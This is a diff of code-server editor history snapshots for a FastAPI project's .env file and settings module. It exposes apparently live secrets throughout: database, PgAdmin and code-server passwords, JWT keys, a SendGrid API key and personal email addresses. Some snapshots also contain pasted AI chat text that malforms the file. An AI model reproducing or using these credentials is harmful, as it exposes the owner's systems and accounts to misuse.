BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/IgjZ b/code-server-config/data/User/History/-5bd368a0/IgjZ new file mode 100755 index 0000000..e293c6b --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/IgjZ @@ -0,0 +1,28 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +# DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + +# --- REDIS (A session kezeléshez) --- +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# Backend (FastAPI) +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/JyZi b/code-server-config/data/User/History/-5bd368a0/JyZi new file mode 100755 index 0000000..b14a51f --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/JyZi @@ -0,0 +1,25 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +DATABASE_URL=postgresql+asyncpg://admin:MiskociA74@postgres-db:5432/service_finder + +# --- REDIS (A session kezeléshez) --- +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# Backend (FastAPI) +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/Sl84 b/code-server-config/data/User/History/-5bd368a0/Sl84 new file mode 100755 index 0000000..b272263 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/Sl84 @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/eSnH b/code-server-config/data/User/History/-5bd368a0/eSnH new file mode 100755 index 0000000..a6c4944 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/eSnH @@ -0,0 +1,39 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/entries.json b/code-server-config/data/User/History/-5bd368a0/entries.json new file mode 100755 index 0000000..7bd0e04 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/.env","entries":[{"id":"JyZi","timestamp":1769023397317},{"id":"meOw","timestamp":1769023413669},{"id":"Dsy9","timestamp":1769023440910},{"id":"IgjZ","timestamp":1769023484114},{"id":"BlV7","timestamp":1769023497973},{"id":"s8EA","timestamp":1769023523457},{"id":"srWn","timestamp":1769023539158},{"id":"0NIq","timestamp":1769023555060},{"id":"IXdY","timestamp":1769023578147},{"id":"eSnH","timestamp":1769023611510},{"id":"27fC","timestamp":1769023625097},{"id":"6P40","timestamp":1769023637337},{"id":"DBmG","timestamp":1769030384002},{"id":"4MYC","timestamp":1769030519241},{"id":"HmdC","timestamp":1769030581579},{"id":"66Rx","timestamp":1769030663915},{"id":"9UOq","timestamp":1769030684948},{"id":"479L","timestamp":1769030713273},{"id":"GwU6","timestamp":1769031002603},{"id":"H5Zm","source":"undoRedo.source","timestamp":1769031004535},{"id":"Sl84","timestamp":1769031008295},{"id":"tXFs","timestamp":1769031119583},{"id":"wEWX","timestamp":1769031342432},{"id":"udmZ","timestamp":1769031624035},{"id":"oM6T","timestamp":1769040618506},{"id":"eqa5","timestamp":1769041052924},{"id":"8R6W","timestamp":1769041437902},{"id":"DqPk","timestamp":1769041452771}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/eqa5 b/code-server-config/data/User/History/-5bd368a0/eqa5 new file mode 100755 index 0000000..22f46ae --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/eqa5 @@ -0,0 +1,59 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 + +SECRET_KEY=SzuperTitkosVéletlenszerűKaraktersorozat_Amit_Csak_Te_Tudsz_2026 + + +SENDGRID_API_KEY=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 +FROM_EMAIL=info@profibot.hu \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/meOw b/code-server-config/data/User/History/-5bd368a0/meOw new file mode 100755 index 0000000..4e17dd4 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/meOw @@ -0,0 +1,26 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +DATABASE_URL=postgresql+asyncpg://admin:MiskociA74@postgres-db:5432/service_finder + +# --- REDIS (A session kezeléshez) --- +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# Backend (FastAPI) +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/oM6T b/code-server-config/data/User/History/-5bd368a0/oM6T new file mode 100755 index 0000000..f3d6691 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/oM6T @@ -0,0 +1,59 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 + +SECRET_KEY=SzuperTitkosVéletlenszerűKaraktersorozat_Amit_Csak_Te_Tudsz_2026 + + +SENDGRID_API_KEY=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 +FROM_EMAIL=kincses@gmail.com \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/s8EA b/code-server-config/data/User/History/-5bd368a0/s8EA new file mode 100755 index 0000000..7a63181 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/s8EA @@ -0,0 +1,70 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +# DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + + PM senior +Egyéni gem + +Ez egy kiváló észrevétel. Nagyon jól teszed, hogy ezeket a kritikus kulcsokat (SECRET_KEY, ALGORITHM) is beemeled a biztonságos környezetbe. Ezek felelnek ugyanis azért, hogy a felhasználóid bejelentkezve maradjanak, és a jelszavak biztonságban legyenek. + +Összeraktam neked a TELJES, VÉGLEGES .env fájlt, ami egyesíti a te meglévő beállításaidat az általam javasolt újakkal. +1. A Master .env fájl (Ezt hozd létre) + +Ebben a fájlban definiáljuk az "igazságot". A Docker Compose innen fogja kiolvasni az értékeket. + +Másold be ezt a fájlt a projekt gyökérkönyvtárába (.env néven): +Properties + +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=szuper_titkos_random_string_amit_senki_nem_tud +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/srWn b/code-server-config/data/User/History/-5bd368a0/srWn new file mode 100755 index 0000000..81471cc --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/srWn @@ -0,0 +1,73 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +# DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + + PM senior +Egyéni gem + +Ez egy kiváló észrevétel. Nagyon jól teszed, hogy ezeket a kritikus kulcsokat (SECRET_KEY, ALGORITHM) is beemeled a biztonságos környezetbe. Ezek felelnek ugyanis azért, hogy a felhasználóid bejelentkezve maradjanak, és a jelszavak biztonságban legyenek. + +Összeraktam neked a TELJES, VÉGLEGES .env fájlt, ami egyesíti a te meglévő beállításaidat az általam javasolt újakkal. +1. A Master .env fájl (Ezt hozd létre) + +Ebben a fájlban definiáljuk az "igazságot". A Docker Compose innen fogja kiolvasni az értékeket. + +Másold be ezt a fájlt a projekt gyökérkönyvtárába (.env néven): +Properties + +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=szuper_titkos_random_string_amit_senki_nem_tud +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/tXFs b/code-server-config/data/User/History/-5bd368a0/tXFs new file mode 100755 index 0000000..e737d66 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/tXFs @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/udmZ b/code-server-config/data/User/History/-5bd368a0/udmZ new file mode 100755 index 0000000..3ca803e --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/udmZ @@ -0,0 +1,55 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 + +SECRET_KEY=SzuperTitkosVéletlenszerűKaraktersorozat_Amit_Csak_Te_Tudsz_2026 \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/wEWX b/code-server-config/data/User/History/-5bd368a0/wEWX new file mode 100755 index 0000000..b582744 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/wEWX @@ -0,0 +1,53 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5e83fa91/4Cft.py b/code-server-config/data/User/History/-5e83fa91/4Cft.py new file mode 100755 index 0000000..3788613 --- /dev/null +++ b/code-server-config/data/User/History/-5e83fa91/4Cft.py @@ -0,0 +1,35 @@ +ffrom typing import Optional +from pydantic_settings import BaseSettings, SettingsConfigDict + +class Settings(BaseSettings): + # --- General --- + PROJECT_NAME: str = "Traffic Ecosystem SuperApp" + VERSION: str = "2.0.0" + API_V1_STR: str = "/api/v1" + + # --- Security --- + SECRET_KEY: str # Must be set in .env + ALGORITHM: str = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES: int = 60 + + # --- Database (Postgres) --- + DATABASE_URL: str # e.g., postgresql+asyncpg://user:pass@db:5432/dbname + + # --- Storage (MinIO) --- + MINIO_ENDPOINT: str # e.g., minio:9000 + MINIO_ACCESS_KEY: str + MINIO_SECRET_KEY: str + MINIO_BUCKET_NAME: str = "fleet-data" + + # --- Cache (Redis) --- + REDIS_URL: str = "redis://redis:6379/0" + + # Pydantic V2 Config + model_config = SettingsConfigDict( + env_file=".env", + env_file_encoding="utf-8", + case_sensitive=True, + extra="ignore" # Ignore extra env vars (like Docker internal vars) + ) + +settings = Settings() \ No newline at end of file diff --git a/code-server-config/data/User/History/-5e83fa91/5GlT.py b/code-server-config/data/User/History/-5e83fa91/5GlT.py new file mode 100755 index 0000000..9c31499 --- /dev/null +++ b/code-server-config/data/User/History/-5e83fa91/5GlT.py @@ -0,0 +1,35 @@ +from typing import Optional +from pydantic_settings import BaseSettings, SettingsConfigDict + +class Settings(BaseSettings): + # --- General --- + PROJECT_NAME: str = "Traffic Ecosystem SuperApp" + VERSION: str = "2.0.0" + API_V1_STR: str = "/api/v1" + + # --- Security --- + SECRET_KEY: str # Must be set in .env + ALGORITHM: str = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES: int = 60 + + # --- Database (Postgres) --- + DATABASE_URL: str # e.g., 